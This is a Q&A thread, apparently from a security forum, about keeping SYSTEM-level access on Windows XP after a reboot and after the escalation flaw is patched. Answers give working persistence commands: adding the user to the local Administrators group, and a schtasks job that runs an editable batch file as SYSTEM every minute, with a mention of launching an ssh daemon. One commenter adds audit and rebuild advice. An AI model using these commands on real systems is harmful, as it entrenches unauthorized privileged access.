1

Is it possible, in Windows XP, to maintain user privileges of a command shell after a reboot?

For example, I'm running as a non-privileged account LocalMachine\Pete, but have a shell running as LocalMachine\System. I want to maintain the privileges of that system shell after a reboot. In Linux this could be accomplished by creating a file that runs under that user. Is there a Windows equivalent?

Rory Alsop
  • 61,367
  • 12
  • 115
  • 320
Petey B
  • 607
  • 1
  • 6
  • 8
  • I'm having trouble imagining your scenario, because my first response would be "use whatever method you used to get the priv shell in the first place". – schroeder May 03 '12 at 21:22
  • @schroeder, This is because the method to get the privlidged shell in the first place is scheduled to be patched, and I'm wondering if user's who have exploited this could possibly maintain that privlidge after patching. – Petey B May 04 '12 at 17:23

3 Answers3

1

From the priv shell:

net localgroup Administrators pete /add

This adds pete to the admin local group, which means he has priv access after boot.

It's not limited to the shell, and would be detected in an audit.

But, as I said, if you got a priv shell in the first place, then rise-repeat?

schroeder
  • 123,438
  • 55
  • 284
  • 319
  • Yeah this was the only thing I could find as well. Will leave the question open for a bit to see if anyone has other suggestions, but will accept it if not. Thanks. – Petey B May 04 '12 at 17:24
  • There are other options once someone has priv access. They could have installed back doors, root kits, grabbed the SAM database and cracked the local admin password. I'd be changing admin passwords, scanning for installs, and doing a full audit on the machine. If any blip shows up, I'd rebuild the machine. – schroeder May 05 '12 at 16:25
1

Use a scheduled task to run a batch file. It will run in non-interactive mode (won't display a window) since you aren't entering a password - but should be able to launch an ssh daemon or something similar that give you a command prompt.

The syntax at the command line is:

schtasks.exe /create /tn <name> /tr test.bat /sc minute /mo 1 /np /rl highest /ru system

That will create a scheduled job running test.bat (which you'd create somewhere in your path, like the windows directory) as SYSTEM that runs every minute. "schtasks.exe /create /?" will give you the full syntax, including options to only run it on start or logon. Running every minute though lets you edit your batch file several times to run multiple commands.

As long as you still have editing permissions to test.bat, you can make it run whatever commands you want.

Grant
  • 1,056
  • 8
  • 15
0

You could set up a scheduled task (Control Panel / Scheduled Tasks) to open the shell, set to occur "When I log on", with whatever user you want it to run as. You'll provide the credentials when setting up the task.

Doug Kavendek
  • 281
  • 1
  • 7
  • Scheduled Tasks require a password when set up, I'm assuming I don't have the password. (I do, but for the sake of the scenario) – Petey B May 03 '12 at 17:45